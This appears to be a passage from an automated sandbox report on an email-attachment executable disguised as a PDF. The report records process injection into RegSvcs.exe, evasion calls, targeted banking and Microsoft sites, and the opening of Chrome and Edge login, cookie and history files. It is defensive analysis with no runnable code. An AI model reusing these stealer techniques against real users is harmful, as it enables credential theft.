                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598031
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597921
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597812
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597699
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597578
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597468
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597355
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597106
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596922
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596812
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596703
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596593
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596484
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596375
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596265
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596156
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596046
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595937
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595827
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595718
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595593
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595484
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595374
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595265
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595156
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595046
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594937
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594827
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594718
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594544
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594401
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594276
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594156
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594046
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Window / User API: threadDelayed 1812
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Window / User API: threadDelayed 8041
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-102681
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exeAPI coverage: 4.4 %
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exeCode function: 0_2_007B445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_007B445A
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exeCode function: 0_2_007BC6D1 FindFirstFileW,FindClose,0_2_007BC6D1
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exeCode function: 0_2_007BC75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_007BC75C
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exeCode function: 0_2_007BEF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_007BEF95
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exeCode function: 0_2_007BF0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_007BF0F2
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exeCode function: 0_2_007BF3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_007BF3F3
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exeCode function: 0_2_007B37EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_007B37EF
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exeCode function: 0_2_007B3B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_007B3B12
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exeCode function: 0_2_007BBCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_007BBCBC
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exeCode function: 0_2_007549A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_007549A0
                Source: RegSvcs.exe, 00000002.00000002.4554296392.00000000040F5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                Source: RegSvcs.exe, 00000002.00000002.4554296392.00000000040F5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                Source: RegSvcs.exe, 00000002.00000002.4554296392.00000000040F5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
                Source: RegSvcs.exe, 00000002.00000002.4554296392.0000000003DD6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                Source: RegSvcs.exe, 00000002.00000002.4554296392.0000000003DD6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                Source: RegSvcs.exe, 00000002.00000002.4554296392.0000000003DD6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
                Source: RegSvcs.exe, 00000002.00000002.4554296392.0000000003DD6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                Source: RegSvcs.exe, 00000002.00000002.4554296392.00000000040F5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
                Source: RegSvcs.exe, 00000002.00000002.4554296392.00000000040F5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                Source: RegSvcs.exe, 00000002.00000002.4554296392.0000000003DD6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                Source: RegSvcs.exe, 00000002.00000002.4554296392.00000000040F5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                Source: RegSvcs.exe, 00000002.00000002.4554296392.00000000040F5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                Source: RegSvcs.exe, 00000002.00000002.4554296392.0000000003DD6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
                Source: RegSvcs.exe, 00000002.00000002.4554296392.0000000003DD6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
                Source: RegSvcs.exe, 00000002.00000002.4554296392.0000000003DD6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
                Source: RegSvcs.exe, 00000002.00000002.4554296392.0000000003DD6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                Source: RegSvcs.exe, 00000002.00000002.4554296392.00000000040F5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                Source: RegSvcs.exe, 00000002.00000002.4554296392.0000000003DD6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                Source: RegSvcs.exe, 00000002.00000002.4554296392.0000000003DD6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                Source: RegSvcs.exe, 00000002.00000002.4554296392.00000000040F5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                Source: RegSvcs.exe, 00000002.00000002.4554296392.00000000040F5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                Source: RegSvcs.exe, 00000002.00000002.4554296392.0000000003DD6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
                Source: RegSvcs.exe, 00000002.00000002.4554296392.00000000040F5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                Source: RegSvcs.exe, 00000002.00000002.4554296392.0000000003DD6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                Source: RegSvcs.exe, 00000002.00000002.4554296392.0000000003DD6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                Source: RegSvcs.exe, 00000002.00000002.4554296392.00000000040F5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                Source: RegSvcs.exe, 00000002.00000002.4554296392.0000000003DD6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
                Source: RegSvcs.exe, 00000002.00000002.4554296392.00000000040F5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                Source: RegSvcs.exe, 00000002.00000002.4554296392.00000000040F5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
                Source: RegSvcs.exe, 00000002.00000002.4554296392.0000000003DD6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                Source: RegSvcs.exe, 00000002.00000002.4554296392.00000000040F5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                Source: RegSvcs.exe, 00000002.00000002.4554296392.00000000040F5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                Source: RegSvcs.exe, 00000002.00000002.4554296392.00000000040F5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
                Source: RegSvcs.exe, 00000002.00000002.4554296392.0000000003DD6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                Source: RegSvcs.exe, 00000002.00000002.4554296392.0000000003DD6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                Source: RegSvcs.exe, 00000002.00000002.4554296392.00000000040F5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                Source: RegSvcs.exe, 00000002.00000002.4554296392.0000000003DD6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                Source: RegSvcs.exe, 00000002.00000002.4554296392.0000000003DD6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
                Source: RegSvcs.exe, 00000002.00000002.4554296392.0000000003DD6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                Source: RegSvcs.exe, 00000002.00000002.4554296392.0000000003DD6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696428655t
                Source: RegSvcs.exe, 00000002.00000002.4554296392.0000000003DD6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                Source: RegSvcs.exe, 00000002.00000002.4548281110.00000000011C8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: RegSvcs.exe, 00000002.00000002.4554296392.00000000040F5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
                Source: RegSvcs.exe, 00000002.00000002.4554296392.0000000003DD6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                Source: RegSvcs.exe, 00000002.00000002.4554296392.0000000003DD6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696428655s
                Source: RegSvcs.exe, 00000002.00000002.4554296392.00000000040F5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696428655f
                Source: RegSvcs.exe, 00000002.00000002.4554296392.0000000003DD6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                Source: RegSvcs.exe, 00000002.00000002.4554296392.0000000003DD6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696428655
                Source: RegSvcs.exe, 00000002.00000002.4554296392.00000000040F5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696428655s
                Source: RegSvcs.exe, 00000002.00000002.4554296392.0000000003DD6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                Source: RegSvcs.exe, 00000002.00000002.4554296392.00000000040F5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696428655o
                Source: RegSvcs.exe, 00000002.00000002.4554296392.0000000003DD6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696428655j
                Source: RegSvcs.exe, 00000002.00000002.4554296392.0000000003DD6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
                Source: RegSvcs.exe, 00000002.00000002.4554296392.00000000040F5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                Source: RegSvcs.exe, 00000002.00000002.4554296392.00000000040F5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696428655
                Source: RegSvcs.exe, 00000002.00000002.4554296392.00000000040F5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                Source: RegSvcs.exe, 00000002.00000002.4554296392.00000000040F5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                Source: RegSvcs.exe, 00000002.00000002.4554296392.00000000040F5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696428655
                Source: RegSvcs.exe, 00000002.00000002.4554296392.00000000040F5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                Source: RegSvcs.exe, 00000002.00000002.4554296392.00000000040F5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                Source: RegSvcs.exe, 00000002.00000002.4554296392.00000000040F5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                Source: RegSvcs.exe, 00000002.00000002.4554296392.0000000003DD6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                Source: RegSvcs.exe, 00000002.00000002.4554296392.00000000040F5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696428655x
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exe API call chain: ExitProcess graph end node graph_0-101452
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exe API call chain: ExitProcess graph end node graph_0-101524
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exe Code function: 0_2_007C3F09 BlockInput, 0_2_007C3F09
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exe Code function: 0_2_00753B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 0_2_00753B3A
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exe Code function: 0_2_00785A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 0_2_00785A7C
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exe Code function: 0_2_00754B37 LoadLibraryA,GetProcAddress, 0_2_00754B37
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exe Code function: 0_2_00E852F0 mov eax, dword ptr fs:[00000030h] 0_2_00E852F0
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exe Code function: 0_2_00E85350 mov eax, dword ptr fs:[00000030h] 0_2_00E85350
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exe Code function: 0_2_00E83CC0 mov eax, dword ptr fs:[00000030h] 0_2_00E83CC0
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exe Code function: 0_2_007A80A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation, 0_2_007A80A9
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exe Code function: 0_2_0077A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_0077A155
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exe Code function: 0_2_0077A124 SetUnhandledExceptionFilter, 0_2_0077A124
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Memory allocated: page read and write | page guard

                HIPS / PFW / Operating System Protection Evasion

                Source: 0.2.PK241200518-EMAIL RELEASE-pdf.exe.3640000.1.raw.unpack, COVID19.cs Reference to suspicious API methods: MapVirtualKey(VKCode, 0u)
                Source: 0.2.PK241200518-EMAIL RELEASE-pdf.exe.3640000.1.raw.unpack, FFDecryptor.cs Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(hModule, method), typeof(T))
                Source: 0.2.PK241200518-EMAIL RELEASE-pdf.exe.3640000.1.raw.unpack, FFDecryptor.cs Reference to suspicious API methods: hModuleList.Add(LoadLibrary(text21 + "\\mozglue.dll"))
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exe Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: D13008
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exe Code function: 0_2_007A87B1 LogonUserW, 0_2_007A87B1
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exe Code function: 0_2_00753B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 0_2_00753B3A
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exe Code function: 0_2_007548D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 0_2_007548D7
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exe Code function: 0_2_007B4C7F mouse_event, 0_2_007B4C7F
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exe"
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exe Code function: 0_2_007A7CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity, 0_2_007A7CAF
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exe Code function: 0_2_007A874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid, 0_2_007A874B
                Source: PK241200518-EMAIL RELEASE-pdf.exe Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                Source: PK241200518-EMAIL RELEASE-pdf.exe Binary or memory string: Shell_TrayWnd
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exe Code function: 0_2_0077862B cpuid 0_2_0077862B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exe Code function: 0_2_00784E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 0_2_00784E87
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exe Code function: 0_2_00791E06 GetUserNameW, 0_2_00791E06
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exe Code function: 0_2_00783F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte, 0_2_00783F3A
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exe Code function: 0_2_007549A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_007549A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                Stealing of Sensitive Information

                Source: Yara match, File source: 00000002.00000002.4548549275.0000000002D41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 0.2.PK241200518-EMAIL RELEASE-pdf.exe.3640000.1.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 0.2.PK241200518-EMAIL RELEASE-pdf.exe.3640000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 00000000.00000002.2102160554.0000000003640000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000002.00000002.4547493912.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: Process Memory Space: PK241200518-EMAIL RELEASE-pdf.exe PID: 1264, type: MEMORYSTR
                Source: Yara match, File source: Process Memory Space: RegSvcs.exe PID: 5908, type: MEMORYSTR
                Source: Yara match, File source: 0.2.PK241200518-EMAIL RELEASE-pdf.exe.3640000.1.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 0.2.PK241200518-EMAIL RELEASE-pdf.exe.3640000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 00000000.00000002.2102160554.0000000003640000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000002.00000002.4547493912.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: Process Memory Space: PK241200518-EMAIL RELEASE-pdf.exe PID: 1264, type: MEMORYSTR
                Source: Yara match, File source: Process Memory Space: RegSvcs.exe PID: 5908, type: MEMORYSTR
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
